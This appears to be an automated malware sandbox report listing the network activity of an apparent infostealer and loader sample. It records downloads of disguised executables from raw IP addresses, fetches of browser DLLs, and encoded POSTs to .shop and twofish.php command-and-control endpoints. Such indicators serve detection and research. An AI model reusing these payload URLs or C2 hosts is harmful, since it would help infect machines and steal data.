Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49725 -> 76.76.21.98:443

Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: file-link-iota.vercel.appCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5fcca567315ff7c87e27582&url=https%253A%252F%252Fyoutransfer.net%252FuuVCUDm6%252Fcb726802f5fcca567315ff7c87e27582 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: youtransfer.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stamppreewntnq.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=GqSSlkptWTmvyJO2hxi0bll8qizelqUeJLuZKZ_yI20-1725464264-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=U.nX0IS3oJ70BnB5OMDCq_TanB01xh8k8GEzNt1lp9o-1725464265-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: condedqpwqm.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=jncs3kGgV1cnnvz_z.raDYbdJfAkkaPbvt1he_gGuTo-1725464275-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=kC4IYwSAX30bx5L_n1ZLbZ5j4TskBRPpBti46V6lABM-1725464304-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic	HTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 62.133.61.172
Source: global traffic	HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 62.133.61.172
Source: global traffic	HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 62.133.61.172Data Raw: 64 61 74 61 3d 73 77 67 55 36 57 6f 66 31 70 38 45 35 49 47 71 49 76 61 37 46 53 54 4e 64 64 57 50 4a 32 50 52 57 52 5f 7a 46 71 73 41 74 65 4f 5a 38 6b 56 68 77 30 46 2d 30 6b 51 48 4a 31 46 70 6e 4b 74 5f 64 66 62 31 73 50 5f 79 6a 33 77 55 6f 54 2d 72 74 6a 5f 57 41 49 6b 6f 79 4f 4e 64 6d 5f 34 34 5f 78 4f 58 57 56 52 4c 35 4f 62 4c 79 78 52 42 46 2d 48 4d 65 69 65 61 76 47 4a 34 4b 45 34 70 Data Ascii: data=swgU6Wof1p8E5IGqIva7FSTNddWPJ2PRWR_zFqsAteOZ8kVhw0F-0kQHJ1FpnKt_dfb1sP_yj3wUoT-rtj_WAIkoyONdm_44_xOXWVRL5ObLyxRBF-HMeieavGJ4KE4p
Source: global traffic	HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 62.133.61.172
Source: global traffic	HTTP traffic detected: HEAD /bobr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /yuop/66d58b1858bcb_crypted.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /prog/66d70775c548d_v.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /nokia/lamp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 31.41.244.9Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /edge/msconfig32.exe#pend HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 154.216.17.178Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /yuop/66d59ef9d4404_premium.exe#upus HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /prog/66d707730e9bf_s.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /yuop/66d72df86b9f3_crypted.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /malesa/66d1b7f7f3765_Front.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /prog/66d70e8640404_trics.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /revada/66c6fcb30b9dd_123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /yuop/66d60cd3ce002_SeparatelyDied.exe#sun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66d70775c548d_v.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /yuop/66d58b1858bcb_crypted.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /edge/msconfig32.exe#pend HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 154.216.17.178Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /yuop/66d59ef9d4404_premium.exe#upus HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66d707730e9bf_s.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /yuop/66d72df86b9f3_crypted.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /malesa/66d1b7f7f3765_Front.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66d70e8640404_trics.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bobr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nokia/lamp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 31.41.244.9Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /revada/66c6fcb30b9dd_123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /yuop/66d60cd3ce002_SeparatelyDied.exe#sun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 561Host: 62.133.61.172

Source: unknown	TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown	TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown	TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown	TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown	TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown	TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown	TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown	TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown	TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown	TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown	TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.178
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.178
Source: unknown	TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.17.178
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0050B480 InternetReadFile,InternetCloseHandle,

2_2_0050B480

Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: file-link-iota.vercel.appCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5fcca567315ff7c87e27582&url=https%253A%252F%252Fyoutransfer.net%252FuuVCUDm6%252Fcb726802f5fcca567315ff7c87e27582 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: youtransfer.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic	HTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 62.133.61.172
Source: global traffic	HTTP traffic detected: GET /prog/66d70775c548d_v.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /yuop/66d58b1858bcb_crypted.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /edge/msconfig32.exe#pend HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 154.216.17.178Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /yuop/66d59ef9d4404_premium.exe#upus HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66d707730e9bf_s.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /yuop/66d72df86b9f3_crypted.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /malesa/66d1b7f7f3765_Front.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66d70e8640404_trics.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bobr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nokia/lamp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 31.41.244.9Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /revada/66c6fcb30b9dd_123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /yuop/66d60cd3ce002_SeparatelyDied.exe#sun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66d70775c548d_v.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66d7077a2064d_l.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66d7077a2064d_l.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: api64.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: 240902180529931.tyr.zont16.com
Source: global traffic	DNS traffic detected: DNS query: file-link-iota.vercel.app
Source: global traffic	DNS traffic detected: DNS query: youtransfer.net
Source: global traffic	DNS traffic detected: DNS query: iplogger.org
Source: global traffic	DNS traffic detected: DNS query: traineiwnqo.shop
Source: global traffic	DNS traffic detected: DNS query: locatedblsoqp.shop
Source: global traffic	DNS traffic detected: DNS query: stamppreewntnq.shop
Source: global traffic	DNS traffic detected: DNS query: condedqpwqm.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stamppreewntnq.shop

Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2388267970.0000000001344000.00000008.00000001.01000000.00000012.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2664396294.000000000134D000.00000008.00000001.01000000.00000012.sdmp	String found in binary or memory: http://.css
Source: m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000000.2388267970.0000000001344000.00000008.00000001.01000000.00000012.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2664396294.000000000134D000.00000008.00000001.01000000.00000012.sdmp	String found in binary or memory: http://.jpg
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/lopsa/66d753b13350c_cry.exe#kiscrypto
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/lopsa/66d753b13350c_cry.exe#kiscrypto.
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe1
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe1.
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe1aH
Source: RegAsm.exe, 00000002.00000002.2425361902.0000000003D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe1n
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe5-i
